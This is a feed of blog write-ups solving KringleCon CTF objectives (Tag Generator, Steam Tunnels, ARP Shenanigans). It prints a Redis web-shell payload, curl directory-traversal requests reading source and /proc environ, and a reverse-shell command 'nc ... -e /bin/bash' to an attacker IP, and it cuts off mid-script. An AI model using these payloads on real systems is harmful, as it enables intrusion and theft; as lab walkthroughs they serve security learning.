&lt;/span>&lt;span class="ln">2&lt;/span>Running: redis-cli --raw -a &lt;span class="s1">&amp;#39;&amp;lt;password censored&amp;gt;&amp;#39;&lt;/span> &lt;span class="s1">&amp;#39;CONFIG&amp;#39;&lt;/span> &lt;span class="s1">&amp;#39;GET&amp;#39;&lt;/span> &lt;span class="s1">&amp;#39;*&amp;#39;&lt;/span>
&lt;span class="ln">3&lt;/span>dbfilename
&lt;span class="ln">4&lt;/span>dump.rdb
&lt;span class="ln">5&lt;/span>requirepass
&lt;span class="hl">&lt;span class="ln">6&lt;/span>R3disp@ss &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> Will be very handy to start a &lt;span class="nb">local&lt;/span> redis-cli session with privileges!
&lt;/span>&lt;span class="ln">7&lt;/span>masterauth
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I was looking around the internet for Redis vulnerabilities including local file access and found
&lt;a href="https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce" target="_blank" rel="noopener">THIS&lt;/a> link which has a section on &lt;strong>Redis RCE&lt;/strong> vulnerability. While that example did not work straight out of the box, it pointed me to the right direction which eventually led me to the below exploit (inspired by
&lt;a href="https://medium.com/@eDodo90/writeup-hack-the-box-reddish-9f99cec8e1be" target="_blank" rel="noopener">this&lt;/a> source) submitted via the &lt;code>redis-cli&lt;/code> using the previously obtained password:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;CONFIG SET dir /var/www/html&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;span class="ln">2&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;CONFIG SET dbfilename exfil.php&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;span class="hl">&lt;span class="ln">3&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;SET PAYLOAD \&amp;#34;&amp;lt;?php system(\$_GET[&amp;#39;cmd&amp;#39;]); ?&amp;gt;\&amp;#34;&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;/span>&lt;span class="ln">4&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;BGSAVE&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> redis-cli -a R3disp@ss
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, to exfiltrate the &lt;code>index.php&lt;/code> I execute a cURL simple command:&lt;/p>
&lt;p>&lt;img src="../images/obj8/redis-bug.png" alt="Redis-Exfil">&lt;/p>
&lt;p>Now that the redis bug is discovered, I can get the promised hints from &lt;code>Holly&lt;/code>:&lt;/p>
&lt;blockquote>
&lt;p>Sorry to be a pest Santa, but could you look at the Tag Generator?
I&amp;rsquo;ve been looking at it, and I wonder if the source code would provide more insight?
I told Noel we should be more careful about disclosing information in error messages.
I tried what you suggested and enumerating all endpoints really is good idea to understand an application&amp;rsquo;s functionality.
Sometimes though, I find the Content-Type header hinders the browser more than it helps.
Blind command injection can be frustrating though. Do you think output redirection would help?&lt;/p>
&lt;/blockquote>
&lt;p>Few more hints also appeared in the badge afterwards:&lt;/p>
&lt;ul>
&lt;li>We might be able to find the problem if we can get source code!&lt;/li>
&lt;li>Can you figure out the path to the script? It&amp;rsquo;s probably on error pages!&lt;/li>
&lt;li>Once you know the path to the file, we need a way to download it!&lt;/li>
&lt;li>Is there an endpoint that will print arbitrary files?&lt;/li>
&lt;li>If you&amp;rsquo;re having trouble seeing the code, watch out for the Content-Type! Your browser might be trying to help (badly)!&lt;/li>
&lt;li>I&amp;rsquo;m sure there&amp;rsquo;s a vulnerability in the source somewhere&amp;hellip; surely Jack wouldn&amp;rsquo;t leave their mark?&lt;/li>
&lt;li>If you find a way to execute code blindly, I bet you can redirect to a file then download that file!&lt;/li>
&lt;li>Remember, the processing happens in the background so you might need to wait a bit after exploiting but before grabbing the output!&lt;/li>
&lt;/ul>
&lt;p>Now it&amp;rsquo;s time to head to the Wrapping Room to talk with &lt;code>Noel&lt;/code>:&lt;/p>
&lt;p>&lt;img src="../images/obj8/noel-boetie.png" alt="Noel Boetie">&lt;/p>
&lt;blockquote>
&lt;p>Welcome to the Wrapping Room, Santa!
The tag generator is acting up.
I feel like the issue has something to do with weird files being uploaded.
Can you help me figure out what&amp;rsquo;s wrong?&lt;/p>
&lt;/blockquote>
&lt;p>The application in question is available via this
&lt;a href="https://tag-generator.kringlecastle.com" target="_blank" rel="noopener">LINK&lt;/a>:&lt;/p>
&lt;p>&lt;img src="../images/obj8/tag-generator.png" alt="Tag-Generator Web App">&lt;/p>
&lt;p>It seems to be a simple web-application that is used to build name-tags by uploading some graphics and adding your own text to it and then downloading the result. I proceed to inspect its source closer, to see what it takes to break it&amp;hellip; 😇&lt;/p>
&lt;p>Since both elves mentioned the file-upload part which may be problematic, I started playing with that to see how it worked:&lt;/p>
&lt;ul>
&lt;li>when trying to upload a &lt;strong>5.2 MB pdf&lt;/strong> file it came back with &lt;code>413 Request Entity Too Large&lt;/code>, no client-side verification.&lt;/li>
&lt;li>when uploading a &lt;strong>smaller text&lt;/strong> file it came back with &lt;code>Something went wrong!&lt;/code> and a more useful error message:&lt;/li>
&lt;/ul>
&lt;p>&lt;img src="../images/obj8/verbose-error-msg.png" alt="Verbose-Tag-Generator Error">&lt;/p>
&lt;p>This helps me to identify that the source code handling the incoming requests are located at &lt;code>/app/lib/app.rb&lt;/code>, which is going to be very useful later on. The hints earlier mention that it should be possible to download this file somehow through one of the API endpoints, I figured this should be the result of some sort of Local File Inclusion (&lt;code>LFI&lt;/code>) vulnerability. To look for this endpoint, I look at the image upload functionality more closely by uploading a valid &lt;strong>png&lt;/strong> image while simultaneously observing the network requests in the Networking Tab of the Developer console:&lt;/p>
&lt;p>&lt;img src="../images/obj8/upload-tag-generator.png" alt="TAG Generator - Upload">&lt;/p>
&lt;p>I notice that the first request was to the &lt;code>/upload&lt;/code> endpoint. Once complete, the image was saved on the server, assigned a UUID and finally returned as a response. Next, there is a new request to same image UUID that was just returned via this other API endpoint: &lt;code>/image?id=&amp;lt;Random-UUID&amp;gt;.png&lt;/code> which fetches the image from the server to display it. I take note of this and then decide to read more about LFI vulnerabilities in Web Applications. This article is especially useful from OWASP about
&lt;a href="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include" target="_blank" rel="noopener">Testing Directory Traversal File Include&lt;/a>. Using this new information, I fire up a terminal on my laptop and use cURL to craft some test requests to this &lt;code>/image&lt;/code> endpoint to see what kind of response comes back. On the very first try it looks quite promising:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>▶ curl https://tag-generator.kringlecastle.com/image?id&lt;span class="o">=&lt;/span>
&lt;span class="ln">2&lt;/span>&amp;lt;h1&amp;gt;Something went wrong!&amp;lt;/h1&amp;gt;
&lt;span class="hl">&lt;span class="ln">3&lt;/span>&amp;lt;p&amp;gt;Error in /app/lib/app.rb: Is a directory @ io_fread - /tmp/&amp;lt;/p&amp;gt;
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The ERROR message after sending an empty &lt;code>id&lt;/code> parameter reveals quite a lot actually! It shows that the &lt;strong>Local File Inclusion / Directory Traversal&lt;/strong> exploit is be possible through this endpoint. Also, it shows that uploads are stored in &lt;code>/tmp/&lt;/code> directory.&lt;/p>
&lt;p>&lt;strong>Note&lt;/strong> that it is essential to use cURL instead of the browser because the API response always has this &lt;code>Content-Type: image/jpeg&lt;/code> header set, which confuses browsers to interpret the payload as an image.&lt;/p>
&lt;p>Finally, I use the intel I gathered to successfully retrieve the Ruby source code of the Web Application:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="hl">&lt;span class="ln">1&lt;/span>▶ curl https://tag-generator.kringlecastle.com/image?id&lt;span class="o">=&lt;/span>../app/lib/app.rb
&lt;/span>&lt;span class="ln">2&lt;/span>&lt;span class="c1"># encoding: ASCII-8BIT&lt;/span>
&lt;span class="ln">3&lt;/span>
&lt;span class="ln">4&lt;/span>&lt;span class="nv">TMP_FOLDER&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;/tmp&amp;#39;&lt;/span>
&lt;span class="ln">5&lt;/span>&lt;span class="nv">FINAL_FOLDER&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;/tmp&amp;#39;&lt;/span>
&lt;span class="ln">6&lt;/span>
&lt;span class="ln">7&lt;/span>&lt;span class="c1"># Don&amp;#39;t put the uploads in the application folder&lt;/span>
&lt;span class="ln">8&lt;/span>Dir.chdir TMP_FOLDER
&lt;span class="ln">9&lt;/span>...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>After fetching the
&lt;a href="../files/obj8/app.rb">file&lt;/a> I examine it closer to see if I can find more clues for retrieving the contents of the &lt;code>GREETZ&lt;/code> env variable. In fact, there are some commented lines from &lt;strong>Jack&lt;/strong> in the &lt;code>handle_zip&lt;/code> function that look promising:&lt;/p>
&lt;pre>&lt;code># I wonder what this will do? --Jack
# if entry.name !~ /^[a-zA-Z0-9._-]+$/
# raise 'Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen'
# end
&lt;/code>&lt;/pre>&lt;p>Eventually, I give up trying to figure out how this would work to my advantage. Nevertheless, I am still able to exfil the ENV variable via the same LFI vulnerability that allowed me to extract the Ruby source code.&lt;/p>
&lt;p>I achieve this by remembering that
&lt;a href="http://www.dba-oracle.com/linux/important_files_directories.htm" target="_blank" rel="noopener">everything is a file in Linux&lt;/a>. I first try to extract &lt;code>/etc/environment&lt;/code> which is just plain empty. Then I recall that every process has its own &lt;code>/proc/PID/environ&lt;/code> file for storing ENV vars, so I try to guess the PID of the Web App and to my big surprise I get it right on the first try:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="hl">&lt;span class="ln"> 1&lt;/span>▶ curl https://tag-generator.kringlecastle.com/image?id&lt;span class="o">=&lt;/span>../proc/1/environ --output -
&lt;/span>&lt;span class="ln"> 2&lt;/span>&lt;span class="nv">PATH&lt;/span>&lt;span class="o">=&lt;/span>/usr/local/bundle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
&lt;span class="ln"> 3&lt;/span>&lt;span class="nv">HOSTNAME&lt;/span>&lt;span class="o">=&lt;/span>cbf2810b7573
&lt;span class="ln"> 4&lt;/span>&lt;span class="nv">RUBY_MAJOR&lt;/span>&lt;span class="o">=&lt;/span>2.7
&lt;span class="ln"> 5&lt;/span>&lt;span class="nv">RUBY_VERSION&lt;/span>&lt;span class="o">=&lt;/span>2.7.0
&lt;span class="ln"> 6&lt;/span>&lt;span class="nv">RUBY_DOWNLOAD_SHA256&lt;/span>&lt;span class="o">=&lt;/span>27d350a52a02b53034ca0794efe518667d558f152656c2baaf08f3d0c8b02343
&lt;span class="ln"> 7&lt;/span>&lt;span class="nv">GEM_HOME&lt;/span>&lt;span class="o">=&lt;/span>/usr/local/bundle
&lt;span class="ln"> 8&lt;/span>&lt;span class="nv">BUNDLE_SILENCE_ROOT_WARNING&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">1&lt;/span>
&lt;span class="ln"> 9&lt;/span>&lt;span class="nv">BUNDLE_APP_CONFIG&lt;/span>&lt;span class="o">=&lt;/span>/usr/local/bundleA
&lt;span class="ln">10&lt;/span>&lt;span class="nv">PP_HOME&lt;/span>&lt;span class="o">=&lt;/span>/app
&lt;span class="ln">11&lt;/span>&lt;span class="nv">PORT&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">4141HOST&lt;/span>&lt;span class="o">=&lt;/span>0.0.0.0
&lt;span class="hl">&lt;span class="ln">12&lt;/span>&lt;span class="nv">GREETZ&lt;/span>&lt;span class="o">=&lt;/span>JackFrostWasHere
&lt;/span>&lt;span class="ln">13&lt;/span>&lt;span class="nv">HOME&lt;/span>&lt;span class="o">=&lt;/span>/home/app
&lt;/code>&lt;/pre>&lt;/div>&lt;p>There it is, the solution to Objective 8: &lt;code>JackFrostWasHere&lt;/code>!&lt;/p>
&lt;p>Quite unintentionally, I also find the same value saved to a TXT file in &lt;code>/tmp/greetz.txt&lt;/code>. At first, I think that it was left there by a fellow HHC contestant, but later on the CHC folks confirmed that it was indeed &lt;code>Jack&lt;/code> himself!&lt;/p>
&lt;p>Anyhow, on to the next one! 😎&lt;/p></description></item><item><title>The Steam Tunnels</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective7/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective7/</guid><description>&lt;h2 id="hack-that-trail">Hack that trail!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Gain access to the steam tunnels.
Who took the turtle doves? Please tell us their first and last name.
For hints on achieving this objective, please visit Minty&amp;rsquo;s dorm room and talk with Minty Candy Cane.&lt;/p>
&lt;/blockquote>
&lt;p>You are told you can find hints in the dorm, so you head there, but before you can enter, you need to solve the PIN at the entrance. Luckily there was an Elf who was ready to provide some hints for this:&lt;/p>
&lt;p>&lt;img src="../images/obj7-dorm.png" alt="Dorm Entrance">&lt;/p>
&lt;blockquote>
&lt;p>Hey kid, it&amp;rsquo;s me, Tangle Coalbox.
I&amp;rsquo;m sleuthing again, and I could use your help.
Ya see, this here number lock&amp;rsquo;s been popped by someone.
I think I know who, but it&amp;rsquo;d sure be great if you could open this up for me.
I&amp;rsquo;ve got a few clues for you.&lt;/p>
&lt;ol>
&lt;li>One digit is repeated once.&lt;/li>
&lt;li>The code is a prime number.&lt;/li>
&lt;li>You can probably tell by looking at the keypad which buttons are used.&lt;/li>
&lt;/ol>
&lt;/blockquote>
&lt;p>To find all the primes which adhere to these constraints, I wrote a small python script that produced the below candidates:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="m">1307&lt;/span>
&lt;span class="m">1373&lt;/span>
&lt;span class="m">1733&lt;/span>
&lt;span class="m">3137&lt;/span>
&lt;span class="m">3371&lt;/span>
&lt;span class="m">3701&lt;/span>
&lt;span class="m">7013&lt;/span>
&lt;span class="m">7103&lt;/span>
&lt;span class="m">7331&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Then I randomly tried the numbers from the bottom of the list, and the first one already opened the door. So finally you are in the dorm and you notice the same PIN is written on the wall&amp;hellip; :D&lt;/p>
&lt;p>&lt;img src="../images/obj7-dorm2.png" alt="Splunk Interface">&lt;/p>
&lt;p>Some hint from Minty:&lt;/p>
&lt;blockquote>
&lt;p>Hi! I&amp;rsquo;m Minty Candycane!
I just LOVE this old game!
I found it on a 5 1/4&amp;rdquo; floppy in the attic.
You should give it a go!
If you get stuck at all, check out this year&amp;rsquo;s talks.
One is about web application penetration testing.
Good luck, and don&amp;rsquo;t get dysentery!&lt;/p>
&lt;/blockquote>
&lt;p>So if you click on the Terminal, it will open a browser frame with a game called &lt;strong>The Holiday Hack Trail&lt;/strong>. You are tasked to solve it. There are 3 modes, &lt;strong>Easy&lt;/strong>, &lt;strong>Medium&lt;/strong> and &lt;strong>Hard&lt;/strong>. As you increase difficulty, you need to solve the same problem with less and less resources (money). On Easy mode, it was rather trivial, on Medium it needed some effort, while on Hard I am not sure if it is possible to solve without some hacking. Instructions on the starting screen:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-text" data-lang="text">It&amp;#39;s nearly time for Kringlecon.
You need to get there before the 25th day of December!
Hitch up your reindeer, gather your supplies, and do your best to make it to the North Pole on time.
Good luck!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>If you select Easy mode, you will notice that the URL contains a bunch of parameters. Apparently, the game in this mode is controlled via URL parameters, which are easy to mess with&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">hhc://trail.hhc/store/?difficulty&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">distance&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">money&lt;/span>&lt;span class="o">=&lt;/span>5000&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">pace&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">curmonth&lt;/span>&lt;span class="o">=&lt;/span>7&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">curday&lt;/span>&lt;span class="o">=&lt;/span>1&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">reindeer&lt;/span>&lt;span class="o">=&lt;/span>2&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">runners&lt;/span>&lt;span class="o">=&lt;/span>2&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">ammo&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">meds&lt;/span>&lt;span class="o">=&lt;/span>20&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">food&lt;/span>&lt;span class="o">=&lt;/span>400&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name0&lt;/span>&lt;span class="o">=&lt;/span>Ryan&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">health0&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond0&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath0&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday0&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth0&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name1&lt;/span>&lt;span class="o">=&lt;/span>Vlad&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">health1&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond1&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath1&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday1&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth1&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name2&lt;/span>&lt;span class="o">=&lt;/span>Jane&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">health2&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond2&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath2&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday2&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth2&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">name3&lt;/span>&lt;span class="o">=&lt;/span>Chris&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">health3&lt;/span>&lt;span class="o">=&lt;/span>100&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">cond3&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">causeofdeath3&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathday3&lt;/span>&lt;span class="o">=&lt;/span>0&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">deathmonth3&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">0&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Particularly interesting is the second parameter: &lt;strong>distance&lt;/strong>. Turns out if you start the game, then modify this parameter, your position will suddenly jump to the position you entered for this param. The goal is to travel 8000 units of distance. If you modify it to be 7999 and then hit &lt;strong>Go&lt;/strong> one more time, then you win straight away. On Medium and Hard modes, this hack is not available however, but for our purposes, this was enough, as solving it on Easy mode already gives you the hints necessary to progress to solving the main Objective.&lt;/p>
&lt;p>&lt;img src="../images/obj7-trail.png" alt="Holiday Hack Trail">&lt;/p>
&lt;blockquote>
&lt;p>You made it - congrats!
Have you played with the key grinder in my room? Check it out!
It turns out: if you have a good image of a key, you can physically copy it.
Maybe you&amp;rsquo;ll see someone hopping around with a key here on campus.
Sometimes you can find it in the Network tab of the browser console.
Deviant has a great talk on it at this year&amp;rsquo;s Con.
He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale.&lt;/p>
&lt;/blockquote>
&lt;p>So the room which hides the entrance to the Steam Tunnels is at the end of the hallway where Minty is, and it seems you will need to do some key crafting. Also mentioned by Minty is a KringleCon
&lt;a href="https://www.youtube.com/watch?v=tbyAc-7Wtv8" target="_blank" rel="noopener">talk&lt;/a> by Deviant Ollam, about physical security around keys and how can one go about copying them.&lt;/p>
&lt;h2 id="bitting-those-keys">Bitting those keys!&lt;/h2>
&lt;p>So once you enter the room, you will notice a small key bitting
&lt;a href="https://key.elfu.org/" target="_blank" rel="noopener">device&lt;/a> on the table, which is useful for crafting keys. You will need it for opening the door to the Steam Tunnels, which hides in the next room, where that character is hopping into:&lt;/p>
&lt;p>&lt;img src="../images/obj7-room.png" alt="Key Room">&lt;/p>
&lt;p>Before you start working on the challenge, be sure to spend a moment to appreciate the decoration. It is quite nicely done! So then when you are ready, it&amp;rsquo;s useful to consider the hint by Minty again. Minty mentioned previously, that sometimes it&amp;rsquo;s enough to have a good image of a key, in order to copy it, not necessary to have physical access. If you watched the youtube video from the hint, then you will definitely know what to do.&lt;/p>
&lt;p>The last thing you need to realise is that the character hopping into the room, wears a key on his waist. If you open the Developer tools of your browser and check the source of that object you will discover that he is the &lt;strong>Krampus&lt;/strong> and if you want to see his key properly, just visit:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">https://2019.kringlecon.com/images/avatars/elves/krampus.png
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once you have the imge and get a good look at the key you can decipher it and find the correct bitting: &lt;strong>122520&lt;/strong>. If you enter this into the bitting machine at &lt;strong>key.elfu.org&lt;/strong> then you will get a key which opens the entrance to the Steam Tunnels. Once you find your way to the end of the Steam Tunnel, you will meet again with &lt;strong>Krampus Hollyfeld&lt;/strong> that is the answer to Objective 7.&lt;/p>
&lt;p>&lt;img src="../images/obj7-tunnels.png" alt="Krampus in Tunnel">&lt;/p>
&lt;blockquote>
&lt;p>Hello there! I’m Krampus Hollyfeld.
I maintain the steam tunnels underneath Elf U,
Keeping all the elves warm and jolly.
Though I spend my time in the tunnels and smoke,
In this whole wide world, there&amp;rsquo;s no happier bloke!&lt;/p>
&lt;/blockquote></description></item><item><title>ARP Shenanigans</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective9/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective9/</guid><description>&lt;p>&lt;img src="../images/obj9/objective9.png" alt="Objective9">&lt;/p>
&lt;p>After solving the Tag Generator objective, I head back to the NetWars room to help &lt;code>Alabaster Snowball&lt;/code> with his Scapy Terminal, in exchange for hints:&lt;/p>
&lt;p>&lt;img src="../images/obj9/alabaster-snowball.png" alt="Alabaster Snowball">&lt;/p>
&lt;blockquote>
&lt;p>Hey Santa! You&amp;rsquo;ve got to check out our Scapy Present Packet Prepper!
Please work through the whole thing to make sure it&amp;rsquo;s helpful for our guests!
I made it so that players can help() to see how to get tasks and hints.
When you&amp;rsquo;re done, maybe you can help me with this other issue I&amp;rsquo;m having.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;img src="../images/obj9/scapy-win.png" alt="Terminal Scapy">&lt;/p>
&lt;p>The exact commands I enter can be found
&lt;a href="../files/obj9/scapy.py">HERE&lt;/a>. They are just wonderful for refreshing my Python/Scapy skillz ahead of the main objective. Next, I get some real good hints from &lt;code>Alabaster&lt;/code>:&lt;/p>
&lt;blockquote>
&lt;p>Oh, I see the Scapy Present Packet Prepper has already been completed!
Now you can help me get access to this machine.
It seems that some interloper here at the North Pole has taken control of the host.
We need to regain access to some important documents associated with Kringle Castle.
Maybe we should try a machine-in-the-middle attack?
That could give us access to manipulate DNS responses.
But we&amp;rsquo;ll still need to cook up something to change the HTTP response.
I&amp;rsquo;m sure glad you&amp;rsquo;re here Santa.&lt;/p>
&lt;/blockquote>
&lt;p>With the following hints appearing in the badge:&lt;/p>
&lt;ul>
&lt;li>Jack Frost must have gotten malware on our host at &lt;code>10.6.6.35&lt;/code> because we can no longer access it&lt;/li>
&lt;li>Try sniffing the eth0 interface using &lt;code>tcpdump -nni eth0&lt;/code> to see if you can view any traffic from that host.&lt;/li>
&lt;li>Hmmm, looks like the host does a DNS request after you successfully do an ARP spoof. Let&amp;rsquo;s return a DNS response resolving the request to our IP.&lt;/li>
&lt;li>The host is performing an ARP request. Perhaps we could do a spoof to perform a &lt;code>machine-in-the-middle&lt;/code> attack. I think we have some sample scapy traffic scripts that could help you in &lt;code>/home/guest/scripts&lt;/code>.&lt;/li>
&lt;li>The malware on the host does an HTTP request for a .deb package. Maybe we can get command line access by sending it a
&lt;a href="http://www.wannescolman.be/?p=98" target="_blank" rel="noopener">command in a customized .deb file&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>First I spend some time wrapping my head around the overall design of this challenge. I end up crafting the below diagram to help with this:&lt;/p>
&lt;p>&lt;img src="../images/obj9/exploit-overview.png" alt="Exploit Architecture">&lt;/p>
&lt;p>Arrows are explained below:&lt;/p>
&lt;ol>
&lt;li>The victim (right) sends an ARP request every second to find the MAC of IP: &lt;strong>10.6.6.53&lt;/strong> (supposedly a local DNS server)&lt;/li>
&lt;li>As the attacker (left) I spoof the ARP response with my own MAC: &lt;strong>4c:24:57🆎ed:84&lt;/strong>&lt;/li>
&lt;li>The victim starts sending DNS queries asking for the IP address of: &lt;strong>ftp.osuosl.org&lt;/strong>&lt;/li>
&lt;li>As the attacker I craft spoofed DNS responses to answer these queries with my own IP: &lt;strong>10.6.6.35&lt;/strong>&lt;/li>
&lt;li>The victim tries to fetch resource &lt;code>/pub/jfrost/backdoor/suriv_amd64.deb&lt;/code> via an HTTP request&lt;/li>
&lt;li>As the attacker I have a custom HTTP server that returns a backdoored version of &lt;code>netcat&lt;/code>&lt;/li>
&lt;li>The victim installs this package which starts a reverse shell session via &lt;code>nc 10.6.6.35 4444 -e /bin/bash&lt;/code>&lt;/li>
&lt;li>As the attacker I start a local listener via &lt;code>nc -lvp 4444&lt;/code> to accept the reverse shell connection to exfil the document&lt;/li>
&lt;/ol>
&lt;p>Modifying the provided python scripts to achieve the ARP spoofing is quite straightforward. The DNS part requires a bit more effort, but the provided pcap examples help a lot:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln"> 1&lt;/span>&lt;span class="ch">#!/usr/bin/python3&lt;/span>
&lt;span class="ln"> 2&lt;/span>&lt;span class="kn">from&lt;/span> &lt;span class="nn">scapy.all&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="o">*&lt;/span>
&lt;span class="ln"> 3&lt;/span>&lt;span class="kn">import&lt;/span> &lt;span class="nn">netifaces&lt;/span> &lt;span class="kn">as&lt;/span> &lt;span class="nn">ni&lt;/span>
&lt;span class="ln"> 4&lt;/span>&lt;span class="kn">import&lt;/span> &lt;span class="nn">uuid&lt;/span>
&lt;span class="ln"> 5&lt;/span>
&lt;span class="ln"> 6&lt;/span>&lt;span class="n">ipaddr&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">ni&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">ifaddresses&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;eth0&amp;#39;&lt;/span>&lt;span class="p">)[&lt;/span>&lt;span class="n">ni&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">AF_INET&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">][&lt;/span>&lt;span class="s1">&amp;#39;addr&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span>
